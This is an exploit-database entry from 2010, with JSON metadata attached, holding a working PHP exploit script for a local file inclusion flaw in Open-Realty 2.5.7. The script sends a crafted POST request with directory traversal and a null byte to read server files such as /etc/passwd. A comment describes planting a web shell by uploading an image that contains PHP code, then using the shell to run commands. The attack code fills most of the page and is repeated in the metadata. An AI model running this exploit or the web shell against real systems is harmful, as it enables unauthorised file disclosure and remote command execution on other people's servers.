Search...

Open-Realty 2.5.7 Local File Disclosure Vulnerability

2010-08-18T00:00:00

ID 1337DAY-ID-13741
Type zdt
Reporter Nikola Petrov
Modified 2010-08-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
Open-Realty 2.5.7 Local File Disclosure Vulnerability
=====================================================

&lt;?php
/*
 * Exploit Title:
 * Date: 2010-08-18
 * Author: Nikola Petrov
 * Vendor: http://open-realty.org/
 * Version: 2.5.7
 */
    /*
        vulnerable: Open-Realty 2.5.7
        LFI: /index.php
         
        upload image with: &lt;?php system("echo \"&lt;?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?&gt;\" &gt; sh.php"); ?&gt;
        include the image and sh.php will be generated.
        proceed with sh.php
 
        MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.
    */
 
    print "\n\n#########################################################################\n";
    print "#LFI discovery and implementation: Nikola Petrov ([email protected])\n";
    print "#Date: 05.09.2009\n";
    print "#########################################################################\n\n";
 
    if($argc &lt; 5) {
        print "usage: $argv[0] host port path file [debug: 1/0]\n";
        print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";
        exit();
    }
 
    $Host = $argv[1];
    $Port = $argv[2];
    $Path = $argv[3];
    $File = $argv[4];
 
    function HttpSend($aHost, $aPort, $aPacket) {
        $Response = "";
 
        if(!$Socket = fsockopen($aHost, $aPort)) {
            print "Error connecting to $aHost:$aPort\n\n";
            exit();
        }
         
        fputs($Socket, $aPacket);
         
        while(!feof($Socket)) $Response .= fread($Socket, 1024);
         
        fclose($Socket);
         
        return $Response;
    }
 
    $VulnRequest = "select_users_lang=". $File . "%00";
     
    $Packet  = "POST {$Path} HTTP/1.1\r\n";
    $Packet .= "Host: {$Host}\r\n";
    $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n";
    $Packet .= "$VulnRequest\n";
 
    if($argv[5] == 1) print $Packet;
 
    print HttpSend($Host, $Port, $Packet);
?&gt;



#  0day.today [2018-02-10]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-13741", "lastseen": "2018-02-10T11:18:15", "viewCount": 103, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-02-10T11:18:15", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-10T11:18:15", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/13741", "description": "Exploit for php platform in category web applications", "title": "Open-Realty 2.5.7 Local File Disclosure Vulnerability", "cvelist": [], "sourceData": "=====================================================\r\nOpen-Realty 2.5.7 Local File Disclosure Vulnerability\r\n=====================================================\r\n\r\n<?php\r\n/*\r\n * Exploit Title:\r\n * Date: 2010-08-18\r\n * Author: Nikola Petrov\r\n * Vendor: http://open-realty.org/\r\n * Version: 2.5.7\r\n */\r\n /*\r\n vulnerable: Open-Realty 2.5.7\r\n LFI: /index.php\r\n \r\n upload image with: <?php system(\"echo \\\"<?php if(isset(\\$_GET[\\\"cmd\\\"])) system(\\$_GET[\\\"cmd\\\"]); ?>\\\" > sh.php\"); ?>\r\n include the image and sh.php will be generated.\r\n proceed with sh.php\r\n \r\n MAGIC_QUOTES must be 'off' and %00 must not be replaced with \\0.\r\n */\r\n \r\n print \"\\n\\n#########################################################################\\n\";\r\n print \"#LFI discovery and implementation: Nikola Petrov ([email\u00a0protected])\\n\";\r\n print \"#Date: 05.09.2009\\n\";\r\n print \"#########################################################################\\n\\n\";\r\n \r\n if($argc < 5) {\r\n print \"usage: $argv[0] host port path file [debug: 1/0]\\n\";\r\n print \"example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\\n\\n\\n\";\r\n exit();\r\n }\r\n \r\n $Host = $argv[1];\r\n $Port = $argv[2];\r\n $Path = $argv[3];\r\n $File = $argv[4];\r\n \r\n function HttpSend($aHost, $aPort, $aPacket) {\r\n $Response = \"\";\r\n \r\n if(!$Socket = fsockopen($aHost, $aPort)) {\r\n print \"Error connecting to $aHost:$aPort\\n\\n\";\r\n exit();\r\n }\r\n \r\n fputs($Socket, $aPacket);\r\n \r\n while(!feof($Socket)) $Response .= fread($Socket, 1024);\r\n \r\n fclose($Socket);\r\n \r\n return $Response;\r\n }\r\n \r\n $VulnRequest = \"select_users_lang=\". $File . \"%00\";\r\n \r\n $Packet = \"POST {$Path} HTTP/1.1\\r\\n\";\r\n $Packet .= \"Host: {$Host}\\r\\n\";\r\n $Packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $Packet .= \"Content-Length: \" . strlen($VulnRequest) . \"\\r\\n\\r\\n\";\r\n $Packet .= \"$VulnRequest\\n\";\r\n \r\n if($argv[5] == 1) print $Packet;\r\n \r\n print HttpSend($Host, $Port, $Packet);\r\n?>\r\n\r\n\n\n# 0day.today [2018-02-10] #", "published": "2010-08-18T00:00:00", "references": [], "reporter": "Nikola Petrov", "modified": "2010-08-18T00:00:00", "href": "https://0day.today/exploit/description/13741", "immutableFields": []}